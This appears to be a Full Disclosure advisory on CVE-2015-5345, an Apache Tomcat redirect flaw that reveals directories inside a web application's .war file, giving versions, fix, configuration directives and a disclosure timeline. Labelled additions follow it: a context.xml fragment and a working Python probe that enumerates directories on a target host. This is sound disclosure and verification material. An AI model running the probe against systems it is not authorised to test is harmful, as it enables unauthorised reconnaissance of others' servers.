================================================================================
Information disclosure vulnerability in Apache Tomcat
================================================================================
Web version at: http://www.qcsec.com/blog/CVE-2015-5345-apache-tomcat-vulnerability.html
================================================================================
On a pentest for a client we discovered a way to obtain information about a web
application's internal structure from the network. We reported the issue to the
vendor and a fix was released. The following security advisory details the
vulnerability and how to resolve it.

CVE reference: CVE-2015-5345
CVSS score:    5.1 (medium)
CVSS vector:   CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N/E:H/RL:O/RC:C

Affected systems
================

Apache Tomcat 9.0.0.M1
Apache Tomcat 8.0.0 to 8.0.29
Apache Tomcat 7.0.0 to 7.0.67
Apache Tomcat 6.0.0 to 6.0.44

Status of older (unsupported) versions of Apache Tomcat is unknown.

Overview
========

The Apache Tomcat application server answers an HTTP request for a directory
that exists in the application's .war file with a redirect to the same path
plus a trailing slash, even when there is nothing to serve at that path. A
remote, unauthenticated user can therefore detect the presence of a web
application and map out its internal directory structure with a dictionary
attack.

Impact
======

The impact of this issue is limited. The presence of a web application can be
detected, and the use of Java can be detected even if identifying headers have
been disabled (by requesting the WEB-INF directory, which every Java web
application contains). An attacker can also determine whether a given string
is a valid directory name inside the application's .war file.

Solution
========

Upgrade your Apache Tomcat installation to at least version 9.0.0.M3, 8.0.30,
7.0.68 or 6.0.45.

Note that two new configuration directives were introduced in these versions of
Apache Tomcat: one to re-enable the redirect that identifies directories
(mapperDirectoryRedirectEnabled, off by default), and one controlling the
redirect that identifies the presence of a web application
(mapperContextRootRedirectEnabled, on by default because switching it off might
cause issues with existing web applications).
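Where those two directives are set, as an added illustration that is not part
of the original advisory or of the Tomcat project's documentation: both are
attributes of the Context element, so they can be set for one application in
its META-INF/context.xml or for every application in Tomcat's conf/context.xml.
The fragment below assumes a fixed Tomcat (9.0.0.M3, 8.0.30, 7.0.68 or 6.0.45
or later; earlier versions ignore unknown attributes) and switches both
redirects off; mapperDirectoryRedirectEnabled is already off by default there
and is only set explicitly so the intent is visible in the file.

```xml
<!-- conf/context.xml (applies to all web applications) or
     <app>/META-INF/context.xml (applies to that application only).
     Added example configuration, not taken from the advisory. -->
<Context mapperContextRootRedirectEnabled="false"
         mapperDirectoryRedirectEnabled="false">
    <!-- Default content of Tomcat's shipped context.xml is kept as-is. -->
    <WatchedResource>WEB-INF/web.xml</WatchedResource>
</Context>
```

After changing mapperContextRootRedirectEnabled, re-test the application: the
mapper then no longer redirects a request for the bare context path (for
example /app without the slash), which is the compatibility issue the advisory
refers to, so any links or bookmarks that rely on that redirect need checking.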
So to completely solve this issue, update Apache Tomcat and switch off
mapperContextRootRedirectEnabled for any web application that you wish to be
undetectable by unauthenticated visitors.

Note also that earlier minor versions of Apache Tomcat 6, 7 and 8 released
after October 2015 may not be vulnerable either, as fixes were introduced there
but later re-engineered in the current versions because of regression issues.
Update to at least one of the versions listed above to be sure of having the
fix as described.

Technical details
=================

When a request is received for a non-existent resource, Tomcat responds with a
404 status code as normal. However, if there is a directory in the
application's .war file corresponding to the requested name, Tomcat responds
with a 302 redirect to the requested path with a trailing slash appended, and
only the request for that redirected path then yields the 404. For example:

+------------------------------+----------------------------------+
| Requested URL                | HTTP response                    |
+------------------------------+----------------------------------+
| http://server/does-not-exist | HTTP/1.1 404 Not Found           |
+------------------------------+----------------------------------+
| http://server/WEB-INF        | HTTP/1.1 302 Found               |
|                              | Location: http://server/WEB-INF/ |
+------------------------------+----------------------------------+
| http://server/WEB-INF/       | HTTP/1.1 404 Not Found           |
+------------------------------+----------------------------------+

This works for any directory inside the application's .war file, including
META-INF or WEB-INF/classes.

Responsible disclosure timeline
===============================

12-Oct-2015  reported to the Apache Tomcat Security Team
13-Oct-2015  report acknowledged
21-Oct-2015  confirmed as a low-risk security issue and informed that it would be fixed
19-Nov-2015  CVE assigned and fix committed
Dec-2015     initial updates released for Tomcat 6, 7, 8, and 9.
             Because a regression occurred for some users, the announcement
             was postponed until new versions were available with the fix as
             an optional configuration parameter (see above).
08-Feb-2016  Apache Tomcat 9.0.0.M3 released
10-Feb-2016  Apache Tomcat 8.0.32 released
12-Feb-2016  Apache Tomcat 6.0.45 released
18-Feb-2016  Apache Tomcat 7.0.68 released
22-Feb-2016  announcement released, this document published

Vendor advisory
===============

https://tomcat.apache.org/security-6.html#Fixed_in_Apache_Tomcat_6.0.45
https://tomcat.apache.org/security-7.html#Fixed_in_Apache_Tomcat_7.0.68
https://tomcat.apache.org/security-8.html#Fixed_in_Apache_Tomcat_8.0.30
https://tomcat.apache.org/security-9.html#Fixed_in_Apache_Tomcat_9.0.0.M3

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
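The redirect oracle described under "Technical details" above, turned into a
probe that can be run against a host you are authorised to test. This is an
added example, not code from the original advisory or from the Tomcat project.
It requests each candidate name without a trailing slash, refuses to follow
redirects, and only counts a 3xx whose Location is exactly the requested path
plus "/" as the mapper's "directory exists" answer, so an application-level
redirect (a servlet bouncing to a login page, for instance) is not mistaken
for a hit. The word list, the host name http://server/app and the fake server
used for the offline run are constructed for illustration.

```python
"""Probe for the CVE-2015-5345 directory redirect in Apache Tomcat.

Added example; not code from the advisory or from Tomcat.  The word list and
the fake server below are constructed for illustration.
"""
import sys
import urllib.error
import urllib.request
from urllib.parse import urlsplit

# Constructed word list: names present in nearly every .war plus a few guesses.
# WEB-INF is the tell-tale entry, since every Java web application has one.
DEFAULT_WORDS = ["WEB-INF", "META-INF", "WEB-INF/classes", "WEB-INF/lib",
                 "admin", "images", "css", "js"]


def classify(requested_path, status, location):
    """Map one response to 'directory', 'missing' or 'other'.

    Only a redirect to exactly requested_path + "/" is counted as the mapper
    behaviour; any other redirect target is reported as 'other'.
    """
    if status == 404:
        return "missing"
    if status in (301, 302, 303, 307, 308) and location:
        # Location may be absolute (as in the advisory's example) or relative.
        if urlsplit(location).path == requested_path + "/":
            return "directory"
    return "other"


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Make urllib surface 3xx answers instead of silently following them."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None  # None makes urlopen raise HTTPError carrying the 3xx


def http_fetch(url, timeout=10):
    """Return (status, Location header or None) for a GET of url."""
    opener = urllib.request.build_opener(_NoRedirect)
    req = urllib.request.Request(url, headers={"User-Agent": "cve-2015-5345-probe"})
    try:
        with opener.open(req, timeout=timeout) as resp:
            return resp.status, resp.headers.get("Location")
    except urllib.error.HTTPError as err:  # raised for 3xx, 4xx and 5xx
        return err.code, err.headers.get("Location")


def probe(base_url, words=DEFAULT_WORDS, fetch=http_fetch):
    """Request base_url/<word> (no trailing slash) for each word and classify.

    base_url is the application's root, e.g. http://server/app.  fetch is
    injectable so the logic can be exercised offline against a fake server.
    """
    results = {}
    for word in words:
        url = base_url.rstrip("/") + "/" + word.strip("/")
        status, location = fetch(url)
        results[word] = classify(urlsplit(url).path, status, location)
    return results


def vulnerable(results):
    """True once any probe drew the mapper's trailing-slash redirect."""
    return any(verdict == "directory" for verdict in results.values())


def fake_vulnerable_fetch(url):
    """Constructed stand-in for an unpatched Tomcat serving /app.

    Directories in the .war: WEB-INF, WEB-INF/classes, META-INF and images.
    /app/admin is a servlet that redirects to a login page; that redirect must
    not be reported as a directory hit.
    """
    dirs = {"/app/WEB-INF", "/app/WEB-INF/classes", "/app/META-INF", "/app/images"}
    parts = urlsplit(url)
    if parts.path in dirs:
        return 302, f"{parts.scheme}://{parts.netloc}{parts.path}/"
    if parts.path == "/app/admin":
        return 302, "/app/login.jsp"
    return 404, None


if __name__ == "__main__":
    # With a URL argument the probe goes over the network; without one it runs
    # against the constructed fake so the output can be inspected offline.
    networked = len(sys.argv) > 1
    target = sys.argv[1] if networked else "http://server/app"
    found = probe(target, fetch=http_fetch if networked else fake_vulnerable_fetch)
    for name, verdict in found.items():
        print(f"{verdict:9} {target.rstrip('/')}/{name}")
    print("vulnerable" if vulnerable(found) else "no mapper redirect observed")
```

A "directory" verdict for WEB-INF is enough to confirm both a Java web
application and a vulnerable Tomcat, whatever the Server header says. The same
classify() logic applied to the bare context path (GET /app with no slash)
exercises the context-root variant that mapperContextRootRedirectEnabled
controls. Against a fixed Tomcat every entry should come back "missing".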